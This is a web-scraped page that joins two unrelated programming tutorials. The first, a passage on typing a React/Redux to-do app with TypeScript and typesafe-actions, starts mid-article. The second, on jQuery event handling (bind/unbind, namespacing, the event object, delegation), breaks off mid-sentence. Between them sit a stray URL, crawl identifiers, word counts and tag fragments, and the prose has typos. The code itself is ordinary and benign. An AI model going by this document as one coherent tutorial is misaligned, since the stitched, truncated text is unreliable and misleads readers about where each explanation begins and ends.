that started the bubbling. By doing this, we can seemly add an event handler to a great deal of DOM elements using only a single event handler/declaration. This is extremely useful; for example, a table with 500 rows where each row requires a click event can take advantage of event delegation. Examine the code below for clarification. <!DOCTYPE html> <html lang="en"> <body> <ul> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> </ul> <script src=""></script> <script> (function ($) { $('ul').click(function (event) { // Attach click handler to <ul> and pass event object // event.target is the <a> $(event.target).parent().remove(); // Remove <li> using parent() return false; // Cancel default browser behavior, stop propagation }); })(jQuery); </script> </body> </html> Now, if you were to literally click on one of the actual bullets of the list and not the link itself, guess what? You'll end up removing the <ul>. Why? Because all clicks bubble. So when you click on the bullet, the event.target is the <li>, not the <a>. Since this is the case, the parent() method will grab the <ul> and remove it. We could update our code so that we only remove an <li> when it is being clicked from an <a> by passing the parent() method an element expression. $(event.target).parent('li').remove(); The important point here is that you have to manage carefully what is being clicked when the clickable area contains multiple encapsulated elements due to the fact that you never know exactly where the user may click. Because of this, you have to check to make sure the click occurred from the element you expected it to. Applying Event Handlers to DOM Elements Regardless of DOM Updates Using live() Using the handy live() event method, you can bind handlers to DOM elements currently in a Web page and those that have yet to be added. The live() method uses event delegation to make sure that newly added/created DOM elements will always respond to event handlers regardless of DOM manipulations or dynamic changes to the DOM. Using live() is essentially a shortcut for manually having to set up event delegation. For example, using live() we could create a button that creates another button indefinitely. <!DOCTYPE html> <html lang="en"> <body> <button>Add another button</button> <script src=""></script> <script> (function ($) { $('button').live('click', function () { $(this).after("<button>Add another button</button>"); }); })(jQuery); </script> </body> </html> After examining the code, it should be obvious that we are using live() to apply event delegation to a parent element ( <body> element in the code example) so that any button element added to the DOM always responds to the click handler. To remove the live event, we simply use the die() method-e.g. $('button').die(). The concept to take away is the live() method could be used to attach events to DOM elements that are removed and added using AJAX. In this way, you would forgo having to rebind events to new elements introduced into the DOM after the initial page load. Notes: live() supports the following handlers: click, dblclick, mousedown, mouseup, mousemove, mouseover, mouseout, keydown, keypress, keyup. live() only works against a selector. live() by default will stop propagation by using return false within the function sent to the live() method. Adding a Function to Several Event Handlers It is possible to pass the event bind() method several event handlers. This makes it possible to attach the same function, written once, to many handlers. In the code example below, we attach a single anonymous callback function to the click, keypress, and resize event handlers on the document. <!DOCTYPE html> <html lang="en"> <body> <script src=""></script> <script> (function ($) { // Responds to multiple events $(document).bind('click keypress resize', function (event) { alert('A click, keypress, or resize event occurred on the document.'); }); })(jQuery); </script> </body> </html> Cancel Default Browser Behavior With preventDefault() When a link is clicked or a form is submitted, the browser will invoke its default functionality associated with these events. For example, click an <a> link and the Web browser will attempt to load the value of the <a> href attribute in the current browser window. To stop the browser from performing this type of functionality, you can use the preventDefault() method of the jQuery normalized event object. <!DOCTYPE html> <html lang="en"> <body> <a href="">jQuery</a> <script src=""></script> <script> (function ($) { // Stops browser from navigating $('a').click(function (event) { event.preventDefault(); }); })(jQuery); </script> </body> </html> Cancel Event Propagation With stopPropagation() Events propagate (a.k.a. bubble) up the DOM. When an event handler is fired for any given element, the invoked event handler is also invoked for all ancestor elements. This default behavior facilitates solutions like event delegation. To prohibit this default bubbling, you can use the jQuery normalized event method stopPropagation(). <!DOCTYPE html> <html lang="en"> <body> <div><span>stop</span></div> <script src=""></script> <script> (function ($) { $('div').click(function (event) { // Attach click handler to <div> alert('You clicked the outer div'); }); $('span').click(function (event) { // Attach click handler to <span> alert('You clicked a span inside of a div element'); // Stop click on <span> from propagating to <div> // If you comment out the line below, //the click event attached to the div will also be invoked event.stopPropagation(); }); })(jQuery); </script> </body> </html> In the code example above, the event handler attached to the <div> element will not be triggered. Cancelling Default Behavior and Event Propagation Via return false Returning false - e.g. return false - is the equivalent of using both preventDefault() and stopPropagation(). <!DOCTYPE html> <html lang="en"> <body><span><a href="javascript:alert('You clicked me!')" class="link">click me</a></span> <script src=""></script> <script> (function($){ $('span').click(function(){ // Add click event to <span> window.location=''; }); $('a').click(function(){ // Ignore clicks on <a> return false; }); })(jQuery); </script> </body> </html> If you were to comment out the return false statement in the code above, alert() would get invoked because by default the browser will execute the value of the href. Also, the page would navigate to jQuery.com due to event bubbling. Create Custom Events and Trigger Them Via trigger() With jQuery, you have the ability to manufacture your own custom events using the bind() method. This is done by providing the bind() method with a unique name for a custom event. Now, because these events are custom and not known to the browser, the only way to invoke custom events is to programmatically trigger them using the jQuery trigger() method. Examine the code below for an example of a custom event that is invoked using trigger(). <!DOCTYPE html> <html lang="en"> <body> <div>jQuery</div> <script src=""></script> <script> (function ($) { $('div').bind('myCustomEvent', function () { // Bind a custom event to <div> window.location = ''; }); $('div').click(function () { // Click the <div> to invoke the custom event $(this).trigger('myCustomEvent'); }) })(jQuery); </script> </body> </html> Cloning Events As Well As DOM Elements By default, cloning DOM structures using the clone() method does not additionally clone the events attached to the DOM elements being cloned. In order to clone the elements and the events attached to the elements you must pass the clone() method a Boolean value of true. <!DOCTYPE html> <html lang="en"> <body> <button>Add another button</button> <a href="#" class="clone">Add another link</a> <script src=""></script> <script> (function ($) { $('button').click(function () { var $this = $(this); $this.clone(true).insertAfter(this); // Clone element and its events $this.text('button').unbind('click'); // Change text, remove event }); $('.clone').click(function () { var $this = $(this); $this.clone().insertAfter(this); // Clone element, but not its events $this.text('link').unbind('click'); // Change text, remove event }); })(jQuery); </script> </body> </html> Getting X and Y Coordinates of the Mouse in the Viewport By attaching a mousemove event to the entire page (document), you can retrieve the X and Y coordinates of the mouse pointer as it moves around inside in the viewport over the canvas. This is done by retrieving the pageY and pageX properties of the jQuery normalized event object. <!DOCTYPE html> <html lang="en"> <body> <script src=""></script> <script> (function ($) { $(document).mousemove(function (e) { // e.pageX - gives you the X position // e.pageY - gives you the Y position $('body').html('e.pageX = ' + e.pageX + ', e.pageY = ' + e.pageY); }); })(jQuery); </script> </body> </html> Getting X and Y Coordinates of the Mouse Relative to Another Element It is often necessary to get the X and Y coordinates of the mouse pointer relative to an element other than the viewport or entire document. This is usually done with ToolTips, where the ToolTip is shown relative to the location that the mouse is hovering. This can easily be accomplished by subtracting the offset of the relative element from the viewport's X and Y mouse coordinates. <!DOCTYPE html> <html lang="en"> <body> <!-- Move mouse over div to get position relative to the div --> <div style="margin: 200px; height: 100px; width: 100px; background: #ccc; padding: 20px"> relative to this </div> <script src=""></script> <script> (function($){ $('div').mousemove(function(e){ //relative to this div element instead of document var relativeX = e.pageX - this.offsetLeft; var relativeY = e.pageY - this.offsetTop; $(this).html('releativeX = ' + relativeX + ', releativeY = ' + relativeY); }); })(jQuery); </script> </body> </html> Envato Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
https://code.tutsplus.com/tutorials/jquery-succinctly-events-jquery--net-33837
CC-MAIN-2019-51
refinedweb
2,854
56.05
Create array from another array in Python (Copy array elements) In this tutorial, you will learn how to create an array from another (existing) array in Python. In simpler words, you will learn to copy the array elements into another array. You must be familiar with what an array is and its uses. To recap, an array is a data structure that stores multiple elements (values) in a single variable. Using Python NumPy library’s method-copy () Syntax: array2=array1.copy() On execution, the above statement returns a new array – array2, which contains exactly the same elements as array1. Here, array1 is the n-dimensional array to be copied. array2 is the new array to be created to contain elements of array1. The same is shown below: import numpy as np array1=np.array([1,2,3]) print("array 1",array1) array2=array1.copy() print("array 2",array2) array 1 [1 2 3] array 2 [1 2 3] It is important to note that first, we are creating a new array instance. Then, we are copying the contents of the original array into the new one. Thus, any changes you, later on, make to the first array will not be reflected in the copied array. import numpy as np array1=np.array([1,2,3]) array2=array1.copy() array1[1]=7 print("array 1",array1) print("array 2",array2) array 1 [1 7 3] array 2 [1 2 3] Well, what happens if you use the assignment operator (=) to copy the array elements? It not only copies the elements but also assigns them as equals. So, any changes made to array1 will automatically be reflected in array2 as shown. import numpy as np array1=np.array([1,2,3]) array2=array1 array1[1]=7 print("array 1",array1) print("array 2",array2) array 1 [1 7 3] array 2 [1 7 3] In better words, you are not creating a new object, but in fact, creating a reference to the original object. For better understanding, observe the code below: import numpy as np array1=np.array([1,2,3]) array2=array1 array1[1]=7 print(id(array1)) print("array 1",array1) print(id(array2)) print("array 2",array2) 1924624603936 array 1 [1 7 3] 1924624603936 array 2 [1 7 3] If you have observed, when you were using the copy () method, you were creating a new array object and not just a reference instance for the original object. Copying the array elements into a new array by looping through in Python - Create a new array with the same length as that of the one to be copied - Loop through the two arrays, copying the elements from the first and then assigning them to the second respectively. Note: Even in this case, you are copying the elements into another array. So, any changes made to array1 will not be reflected in array2. import numpy as np array1=np.array([1,2,3]) print("array 1",array1) array2=[None]*len(array1) for i in range(0,len(array1)): array2[i]=array1[i] print("array 2",array2) array 1 [1 2 3] array 2 [1, 2, 3] To learn more about Python arrays, Python Array Module
https://www.codespeedy.com/create-array-from-another-array-in-python-copy-array-elements/
CC-MAIN-2021-43
refinedweb
533
53.61
Visual Basic Over the last week I've had a chance to play around with RubyCLR (John Lam is the brains behind it - what an awesome project!). I thought that I would post some thoughts around it and some "tutorial" like articles since the documentation was a bit scarce and it took me a while to figure out certain things that I hope will help you in your quest to connect Ruby with CLR objects. I'll be working with Visual Basic since I think there are some really cool things in VB that should make it easier to work with Ruby classes, but John hasn't implemented them yet; I will have a separate post with some requests to follow. I will assume that you have downloaded RubyCLR and Ruby itself, and followed the instructions to get it to work. I was able to get it to work by using Ruby 1.8.4 and the 1.8.4 sources. I've also included a zip file with the VB sources and the ruby source. The application that we are going to build (trivial application, just to demonstrate how things work) will have the ruby script call a method in a class in VB. Then, the ruby script will create an instance of it's own class, pass it to VB, and have VB call a method on it. Calling a VB function This first part is pretty trivial. The following code is the VB method we will call: Public Sub DoAction( x as String, i as Integer ) Console.WriteLine( "You gave me a string {0} and an integer {1}", x, i ) End Sub In Ruby, we simply do the following: vbclass = Sample::Sample.new vbclass.DoAction( "tim", 10 ) Getting VB to call a method in a Ruby class This part was more challenging. I had to dig through a bunch of stuff in order to figure it out. The current implementation of RubyCLR only exposes Ruby methods that match an interface declared in .NET. This s one of the things I will ask John about in my next post. Here's the .NET interface I compiled with my VB assembly: Public Interface IRubyCallable sub Go() sub Go2(x) End Interface Here's the Ruby class. I will comment on it below. class RubyClass include RubyClr::Bindable def clr_interfaces ['Sample.IRubyCallable'] end def get_binding_context ['X'] def X def go puts 'We are go!' def go2( x ) print 'We are go with x = ', x end First of all, you need to include the RubyClr::Bindable mixin. This will cause the RubyCLR to consider this class for .NET bridging. You need a method called "clr_interfaces" which returns an array of qualified interface names that this class implements. RubyCLR will expose the methods on these interfaces to the .NET object. You need a method called "get_binding_context" which returns an array of property names in the current class. The current implementation of RubyCLR requires this even if you don't want a property exposed; I just put a dummy property name. Finally, you implement the two interface methods. Here's the VB code to consume: Public Sub CallRuby( x as Object ) Console.WriteLine( "Try to call a method on object..." ) x.Go() x.Go2( 10 ) Notice that I'm using the late binding feature in VB, rather then typing to the interface. This is one thing that I think John can do to make the VB experience better; exposing all methods in any Bindable Ruby class, and letting the VB late binder resolve method calls at runtime. I will post more on these thoughts later. Now, if you run the Ruby script, you should see the two statements outputted to your console. It took me way too long to get this working, so I hope that this will help you on your way to Ruby+VB+C# bliss.
http://blogs.msdn.com/timng/archive/2006/08/19/708049.aspx
crawl-002
refinedweb
645
69.92
Defining kinds without an associated datatype This ticket to track this request is #6024. cannot use kinds (such as *) while defining a datatype, so we are forced to make Universe a as above, because those are also constructors of Universe. Solution: let users define things like data kind Universe = Sum Universe Universe | Prod Universe Universe | K * By using data kind, we tell GHC that we are only interested in the Universe kind, and not the datatype. Consequently, Sum, Prod, and K will be types only, and not constructors. Also, data type D = C defines a datatype D which is not promoted to a kind, and its constructor C is not promoted to a type. Caveats Star in Star If, in the future, we make * :: *, we will no longer have separation of types and kinds, so we won't be able to make such fine distinctions. Recursive Groups Kind and Type Namespaces As kinds and types currently share a namespace, data kind and data type declarations in the same module can still conflict. However, if they are in separate modules, this can be controlled by use of the module system. Alternative Solutions Add data Star in GHC.Exts such that the promotion of datatype Star is the kind *. As a datatype, Star is just an empty datatype. Advantages: very easy, backwards compatible Disadvantages: somewhat verbose, doesn't fix (2) Alternative Notations - Use data only instead of data type. - Use 'data instead of data kind, suggested by Gabor Greif. In both cases, we felt that using type and kind as the modifiers to the data declaration better reflect what's being defined.
https://ghc.haskell.org/trac/ghc/wiki/GhcKinds/KindsWithoutData?version=15
CC-MAIN-2015-11
refinedweb
270
60.65
The input() implementation is a bit like this: def input(prompt): if stdin and stdout are the original file descriptors, and are terminals: return PyOS_Readline(sys.stdin, sys.stdout, prompt) else: sys.stdout.write(prompt) # Writes to stdout return sys.stdin.readline() def PyOS_StdioReadline(stdin, stdout, prompt): '''Default implementation of PyOS_Readline()''' sys.stderr.write(prompt) # Writes to stderr return stdin.readline() def call_readline(stdin, stdout, prompt): '''Implementation of PyOS_Readline() in the "readline" module''' rl_instream = stdin rl_outstream = stdout # Readline writes to stdout return readline_until_enter_or_signal(prompt) It looks like PyOS_StdioReadline() has always written to stderr. The stdin and stdout parameters of PyOS_Readline() were added later, in revision dc4a0336a2a3. I think the changes to myreadline.c will also affect the interactive interpreter prompt. But we have Issue 12869 open to change that to stdout, so maybe the change is okay. Since input() should no longer depend on any instance of stderr, perhaps the check for “lost sys.stderr” should also be removed. It may be worth applying any changes in myreadline.c to the independent version in pgenmain.c as well, just for consistency.
https://bugs.python.org/msg255080
CC-MAIN-2022-05
refinedweb
181
52.15
Question This exercise asks to print a particular index of a list. Can list elements be accessed in any order? Answer Yes, list elements can be accessed in any order so long as the index used is valid. Valid indexes for a list are values from 0 through len() - 1 of the list. The following example shows a list whose items are randomly accessed using the randint() function. As long as the value returned by randint() is between 0 and len() -1 for the list, there is no issue accessing the list items. If the index used is greater than len() -1 for the list, then an IndexError will occur. The exception to this is the use of a negative index. A negative index will return an element from the end of the list without needing to know how many items are in the list. from random import randint elements = ['Hydrogen', 'Helium', 'Carbon', 'Oxygen', 'Nitrogen'] for count in range(10): index = randint(0, len(elements) - 1) print(elements[index])
https://discuss.codecademy.com/t/can-items-of-a-list-be-accessed-in-any-order/349665
CC-MAIN-2018-34
refinedweb
169
71.75
C++ FAQ - How to swap the two numbers without using temporary variable? It is easy to swap two numbers using a temporary variable. double a = 22.66; double b = 55.62; double t = 0; t = a; a = b; b = t; How about swaping the numbers with out using a temporary variable. Look at the sample code given below: Source Code #include <stdio.h> #include <iostream> #include <tchar.h> int _tmain(int argc, _TCHAR* argv[]) { // Swap the two numbers with out using temporary variables double a = 22.66; double b = 55.62; std::cout << "Step1: " << a << "\t" << b << "\n"; a = a + b; // Get the sum of two numbers and assign it to a std::cout << "Step2: " << a << "\t" << b << "\n"; b = a - b; // a (sum) - b would give you original value of a and assign it to b. std::cout << "Step3: " << a << "\t" << b << "\n"; a = a - b; // a (sum) - b(currently holds the orinial value of a) would give you b and assign it to a. std::cout << "Step4: " << a << "\t" << b << "\n"; return 0; } Output Step1: 22.66 55.62 Step2: 78.28 55.62 Step3: 78.28 22.66 Step4: 55.62 22.66
http://www.softwareandfinance.com/CSharp/FAQ_Swap_Numbers.html
CC-MAIN-2017-47
refinedweb
196
84.98
6.5. Functions can Call Other Functions¶ It is important to understand that each of the functions we write can be used and called from other functions we write. This is one of the most important ways that computer scientists take a large problem and break it down into a group of smaller problems. This process of breaking a problem into smaller subproblems is called functional decomposition. Here’s a simple example of functional decomposition using two functions. The first function called square simply computes the square of a given number. The second function called sum_of_squares makes use of square to compute the sum of three numbers that have been squared. (sumofsquares) Even though this is a pretty simple idea, in practice this example illustrates many very important Python concepts, including local and global variables along with parameter passing. Note that when you step through this example, codelens bolds line 1 and line 5 as the functions are defined. The body of square is not executed until it is called from the sum_of_squares function for the first time on line 6. Also notice that when square is called there are two groups of local variables, one for square and one for sum_of_squares. As you step through you will notice that x, and y are local variables in both functions and may even have different values. This illustrates that even though they are named the same, they are in fact, very different. Now we will look at another example that uses two functions.. So we eventually come up with this rather nice code that can draw a rectangle. def drawRectangle(t, w, h): """Get turtle t to draw a rectangle of width w and height h.""" for i in range(2): t.forward(w) t.left(90) t.forward(h) t.left(90) The parameter names are deliberately chosen as single letters to ensure they’re not misunderstood. In real programs, once you’ve had more experience, we will insist on better variable names than this. The point is that the program doesn’t “understand” that you’re drawing a rectangle or that the parameters represent the width and the height. Concepts like rectangle, width, and height are meaningful for humans. They are not concepts that the program or the computer understands. Thinking like a computer. def drawSquare(tx, sz): # a new version of drawSquare drawRectangle(tx, sz, sz) Here is the entire example with the necessary set up code. There are some points worth noting here: - Functions can call other functions. - Rewriting drawSquare like this captures the relationship that we’ve spotted. - A caller of this function might say drawSquare(tess, 50). The parameters of this function, txand sz, are assigned the values of the tess object, and the integer 50 respectively. - In the body of the function, tzand szare just like any other variable. - When the call is made to drawRectangle, the values in variables txand szare fetched first, then the call happens. So as we enter the top of function drawRectangle, its variable tis assigned the tess object, and wand hin that function are both given the value 50.. The function (including its name) can capture your mental chunking, or abstraction, of the problem. - Creating a new function can make a program smaller by eliminating repetitive code. - Sometimes you can write functions that allow you to solve a specific problem using a more general solution. Lab - Drawing a Circle In this guided lab exercise we will work through a simple problem solving exercise related to drawing a circle with the turtle.
http://interactivepython.org/runestone/static/thinkcspy/Functions/Functionscancallotherfunctions.html
CC-MAIN-2017-22
refinedweb
593
62.78
An Autonomous Sailing Robot To Clean Up Oil Spills Roblimo posted more than 3 years ago | from the sailing-without-human-help dept. (4, Funny) fred911 (83970) | more than 3 years ago | (#35768990) .. are belong to us Re:All your oil slicks (-1) Anonymous Coward | more than 3 years ago | (#35769204) Crowd sourced! Collaborative! (0) Anonymous Coward | more than 3 years ago | (#35769012) This crowd sourced, open source hardware, collaboratively developed project could help prevent the tragedy of the next oil spill. Furthermore, it is a prime example of what people can do together when they collaborate, working together on the research and development, design, and funding. Be still, my beating heart! Re:Crowd sourced! Collaborative! (2) camperdave (969942) | more than 3 years ago | (#35769294) ...:Crowd sourced! Collaborative! (1) rDouglass (1068738) | more than 3 years ago | (#35769358) Re:Crowd sourced! Collaborative! (1) LifesABeach (234436) | more than 3 years ago | (#35769876) Grammar (1) Anonymous Coward | more than 3 years ago | (#35769022) Whoever wrote that copy needs to learn how to use a hyphen. Re:Grammar (5, Funny) rDouglass (1068738) | more than 3 years ago | (#35769048) OSHW (1) Yetihehe (971185) | more than 3 years ago | (#35769068) Or it guarantees that no one will make this in enough quantity, only 20 of them from 3 hackerspaces... Re:OSHW (0) Anonymous Coward | more than 3 years ago | (#35769150) Or, remediation companies wanting cheaper alternatives to their expensive boats and crews, outsource the manufacturing of these things. It may be open hardware, but the tooling, machinery, and manufacturing know how aren't. And even then, when one actually builds one of these, I can guarantee you that things that the designers never thought of and bugs in the design will pop up; which will become proprietary knowledge of said manufacturer. Oh yeah, PROFIT! Re:OSHW (4, Informative) Rich0 (548339) | more than 3 years ago | (#35769338):OSHW (-1) Anonymous Coward | more than 3 years ago | (#35769488) "It looks like it discharges cleaner water into the ocean." Bullshit. Quote, please. Re:OSHW (1) funwithBSD (245349) | more than 3 years ago | (#35773918) We are from the Government, and we are here to help. Re:OSHW (0) Anonymous Coward | more than 3 years ago | (#35775280) Where did you read this? This honestly sounds like you have been duped into repeating some dishonest, right-wing paranoia. I heard this story about cleanup ships being turned away, but it involved a different law and was an event fabricated out of whole cloth. I suspect that someone fabricated the story you have repeated as well because ships were not turned away. It sounds like reflexive, anti-government/anti-regulation propaganda. Re:OSHW (4, Insightful) Doc Ruby (173196) | more than 3 years ago | (#35769164) (4, Informative) mdfst13 (664665) | more than 3 years ago | (#35771424)] AAHAHAH!! (0) Servaas (1050156) | more than 3 years ago | (#35769070) Re:AAHAHAH!! (1) rDouglass (1068738) | more than 3 years ago | (#35769108) Re:AAHAHAH!! (1) Servaas (1050156) | more than 3 years ago | (#35769138) Re:AAHAHAH!! (1) rDouglass (1068738) | more than 3 years ago | (#35769160) Re:AAHAHAH!! (0) Anonymous Coward | more than 3 years ago | (#35769346) There is a solution: Reduce energy consumption, improve energy efficiency and use less catastrophic sources of energy. We choose not to implement this solution. Re:AAHAHAH!! (0) Anonymous Coward | more than 3 years ago | (#35772586) I know of a few organizations in Central and South America that may find some uses. Re:AAHAHAH!! (1) tzot (834456) | more than 3 years ago | (#35782916) >. (3, Interesting) rDouglass (1068738) | more than 3 years ago | (#35769090) Re:$150 pledge gives me more than just a hoodie. (1) RockDoctor (15477) | more than 3 years ago | (#35820806) Congratulations ; a positive contribution. It's news to me too, which annoys me more than a little as I work in the industry. But it doesn't particularly surprise me - the industry is notoriously discussion-of-risk averse. Not affiliated, except by being a funder? ... well, it's your slice of cake ; it's up to you to choose whether you wish to eat it. (But it doesn't keep!) Which one of the many was that? Oh, you mean the relatively recent one in the American Gulf, not the routine and continuing ones in the Persian Gulf, Caspian Sea, South China Sea, etc, etc ad nauseam. Let alone the many continuing leaks in and around ports, from small shipwrecks, etc. Or is this only a tool suitable for use in big events? It's an interesting technology. When did you sell your last car and revoke your driving license? How many flights are you foregoing this year and using video-conferencing instead? Does this week's food shopping have a lower food-miles bill than last week's shopping? Did I mention it's open sourced? (2) zill (1690130) | more than 3 years ago | (#35769094) ..:Did I mention it's open sourced? (2) rDouglass (1068738) | more than 3 years ago | (#35769186) Re:Did I mention it's open sourced? (0) Anonymous Coward | more than 3 years ago | (#35769440) People have to be told, repeatedly, and in demonstrable terms, that open source is important. Babbling incoherently about a mishmash of esoteric freetard jargon isn't going to convert anyone. Especially not those Silicon Valley execs. You saw Richard Stallman as an iconic visionary that they didn't get. They saw a looney hippie with ridiculous idealism and zealotry whose ideas are obviously unworkable for them. You're never going to see software companies suddenly "get it" en masse and open source everything they do, as Stallman desires. Most of them would go out of business because the only known successful profit models in Open Source only work for fairly narrow categories of software. Also, in what way is anything these people are doing important yet? They have made a few toy boats by processes which appear to involve precious little engineering. Great, they're having fun building odd RC models by the seat of their pants. Wake me up when they actually have a real world saving technology, by which I mean something full size that has proven its ability to not sink or be damaged by rough seas and has also proven its ability to usefully replace existing oil cleanup systems. You probably aren't actually an engineer, so you probably aren't aware that scaling problems and refining a concept technology (especially a somewhat out-there one like this) so that it is useful in practice are both enormous problems. They're not 90% there, they're not 50% there, they're probably not even 5% there, and they certainly haven't proven that they'll be able to get good results with more funding. But this FA tries to make it sound like it's a sure thing, or maybe already accomplished, and it's Super Awesome that Open Source Did This!!!! Re:Did I mention it's open sourced? (2) rDouglass (1068738) | more than 3 years ago | (#35769516) Re:Did I mention it's open sourced? (1) DerekLyons (302214) | more than 3 years ago | (#35771170) (4, Insightful) seepho (1959226) | more than 3 years ago | (#35769104) Re:Unsinkable (1) couchslug (175151) | more than 3 years ago | (#35769854) "Haven't we learned by now not to call any sort of seafaring vessel unsinkable?" No. Plastic? (1) Anonymous Coward | more than 3 years ago | (#35769122) the joy out of it. Worse, if you collect it, noone wants you to park in their port, since they think you might want to return (what is part of their problem) to them, and thats how the crap got out there in the first place. Re:Plastic? (1) HornWumpus (783565) | more than 3 years ago | (#35770154) Think about it. That's where these things will wind up floating dead if they are ever produced at all. BTW if you are sailing and competent you would stay in the trade winds and hence out of the patch. Re:Plastic? (2) jbengt (874751) | more than 3 years ago | (#35770580) If you sailed through it, there's a decent chance you wouldn't notice it, as it is composed of small, widely dispersed particles. Which is just the size for pieces of plastic to cause problems for a lot of hungry sea life. Cleaning Up the Appearance of Tragedy (4, Insightful) Doc Ruby (173196) | more than 3 years ago | (#35769152):Cleaning Up the Appearance of Tragedy (2) rDouglass (1068738) | more than 3 years ago | (#35769198) Re:Cleaning Up the Appearance of Tragedy (1) hedwards (940851) | more than 3 years ago | (#35769210):Cleaning Up the Appearance of Tragedy (1) Doc Ruby (173196) | more than 3 years ago | (#35769954) The problem is that what you just said is one of the stupidest things I've heard about an oil spill. Re:Cleaning Up the Appearance of Tragedy (0) Anonymous Coward | more than 3 years ago | (#35769584) Cleaning up below the surface with oxygen. (3, Interesting) nido (102070) | more than 3 years ago | (#357698:Cleaning up below the surface with oxygen. (1) HornWumpus (783565) | more than 3 years ago | (#35770194) to make the Chinese very nervous it might be a good idea. Then again the Japanese might just trade the Chinese the Enterprise for a few ships built to spec. Re:Cleaning up below the surface with oxygen. (1) nido (102070) | more than 3 years ago | (#35770334):Cleaning up below the surface with oxygen. (1) DerekLyons (302214) | more than 3 years ago | (#35771826)FLMAO". In some universe where the US would even consider selling the Enterprise... that might be a useful endeavor. Here in the real universe, your letter will be filed where it belongs - in the recycling bin. In some universe where the Japanese have any experience fabricating HEU fuel, let alone refuelling the reactors - you'd have a good point. Here in the real universe the Japanese not only lack the infrastructure, the lack even a fraction of the relevant experience. Just as I said the last time you posted this nonsense - you haven't the foggiest clue what you're talking about. We even engaged in a lengthy discussion where it appeared you might be interested in and capable of learning - but now the truth is apparent... you're an ignorant nutjob. my fixation on the Enterprise is about marketing (1) nido (102070) | more than 3 years ago | (#35772122) a retired LHA would be good. One of the posters at the USNI said LHA-1 is currently awaiting it's fate as a target. Ideas of every type have to be marketed before they can be implemented, and "Send the USS Tarawa" doesn't market like Enterprise. :) Here's those links: [conflicthealth.com] [usni.org] I have a comment at each of those two links. I'll appreciate your response here. Re:Cleaning up below the surface with oxygen. (1) RockDoctor (15477) | more than 3 years ago | (#35821216) Well, it's compactly presented and has obviously had fair thought applied to it, so it deserves a reasoned response. Probably true. Unfortunately human nature isn't very good at giving a shit about things it can't see. You did say "effectively" ; what's the undocking and sailing time for such a vessel from, for example, the USN docks on the West Coast to, for example, the source of much of America's energy in the Persian Gulf? A week, a month, six weeks? Having resources on "hot standby" has costs, real costs. What's the annual leakage of pollution (nuclear, chemical, biological) from a crewed carrier already? Let alone the actual operating cost? It's an idea ; I don't think it's a particularly good one, but it's an idea. The Protei (wrong case, surely?), as an idea for a low-maintenance ocean-going platform, has a lot of interesting potentials. It might even be plausible to rapidly re-purpose one (or many) from their normal duties to perform clean-up. An anonymous sailing robot??? (2) stevegee58 (1179505) | more than 3 years ago | (#35769258) Oh. Nevar mind. Wind Power (2, Interesting) Anonymous Coward | more than 3 years ago | (#35769362) Why use wind power when there's all that juicy oil floating around?? the OTHER application of this... (2) 0WaitState (231806) | more than 3 years ago | (#35769432):the OTHER application of this... (1) popeyethesailorman (735746) | more than 3 years ago | (#35774206) ...?! (2) the_skywise (189793) | more than 3 years ago | (#35769522) But will it still have trouble finding home base to recharge?! How much for low cost? (3, Informative) Hairy1 (180056) | more than 3 years ago | (#35769632):How much for low cost? (1) rDouglass (1068738) | more than 3 years ago | (#35769706) Re:How much for low cost? (1) Hairy1 (180056) | more than 3 years ago | (#35769936) directed into developing systems to carry cargo. Think about cargo ships sailing into dangerous areas - such as those with pirates. If you have a ship that is autonomous there are no lives to risk, and if boarded the control systems could be buried under tons of cargo; impossible to reach, and with ability to control from on board. Such vessels would be controlled by satellite. They would of course need the software to run autonomously, including interfacing with radar, GPS, visual etc. Another advantage with this approach would be that you could make them smaller, and make them sailing ships; or perhaps wind turbine or kite assisted. Plenty of possibilities to reduce the carbon emissions of international trade. autonomy and liability (0) Anonymous Coward | more than 3 years ago | (#35771784) I think the real problem with autonomous boats is the liability aspect. Admiralty and maritime law doesn't explicitly deal with this, so it's going to be very difficult to get insurance cover, so you'd basically wind up doing what cheap shippers do.. use a flag of convenience and make sure there's no assets to sue for. There's several fairly good law review type articles discussing this issue out there on the web. Nobody is going to pay for an autonomous ship that might run into a Disney cruise ship full of terminally ill children on their "make a wish" cruise. Re:How much for low cost? (2) Zerth (26112) | more than 3 years ago | (#35772150) So the pirates can just climb on, take the cargo, and sail off without anybody trying to stop them? Awesome. Re:How much for low cost? (1) Hairy1 (180056) | more than 3 years ago | (#35779354). can you say, "free parts". (0) Anonymous Coward | more than 3 years ago | (#35770262) How are they planning on protecting these anonymous devices on the high seas? Can it dive for long periods of time? Not enough power generation (1) nonsequitor (893813) | more than 3 years ago | (#35771658)? (1) Billy the Mountain (225541) | more than 3 years ago | (#35772354) Another, more informative video (2) rDouglass (1068738) | more than 3 years ago | (#35772676) Dear Subby (0) AP31R0N (723649) | more than 3 years ago | (#35774276).
http://beta.slashdot.org/story/150136
CC-MAIN-2014-41
refinedweb
2,484
70.94
30828/how-do-you-add-a-background-thread-to-flask-in-python The example below creates a background thread that executes every 5 seconds and manipulates data structures that are also available to Flask routed functions. import threading import atexit from flask import Flask POOL_TIME = 5 #Seconds # variables that are accessible from anywhere commonDataStruct = {} # lock to control access to variable dataLock = threading.Lock() # thread handler yourThread = threading.Thread() def create_app(): app = Flask(__name__) def interrupt(): global yourThread yourThread.cancel() def doStuff(): global commonDataStruct global yourThread with dataLock: # Do your stuff with commonDataStruct Here # Set the next thread to happen yourThread = threading.Timer(POOL_TIME, doStuff, ()) yourThread.start() def doStuffStart(): # Do initialisation stuff here global yourThread # Create your thread yourThread = threading.Timer(POOL_TIME, doStuff, ()) yourThread.start() # Initiate doStuffStart() # When you kill Flask (SIGTERM), clear the trigger for the next thread atexit.register(interrupt) return app app = create_app() Call it from Gunicorn with something like this: gunicorn -b 0.0.0.0:5000 --log-config log.conf --pid=app.pid myfile:app You can use '\n' for a next ...READ MORE ''' This is a multiline comment. I ...READ MORE connect mysql database with python import MySQLdb db = ...READ MORE For Python 3, try doing this: import urllib.request, ...READ MORE if you google it you can find. ...READ MORE Syntax : list. count(value) Code: colors = ['red', 'green', ...READ MORE can you give an example using a ...READ MORE You can simply the built-in function in ...READ MORE Not sure what your desired output is, ...READ MORE It shouldn't matter whether the connection is ...READ MORE OR
https://www.edureka.co/community/30828/how-do-you-add-a-background-thread-to-flask-in-python?show=30831
CC-MAIN-2019-35
refinedweb
265
61.33
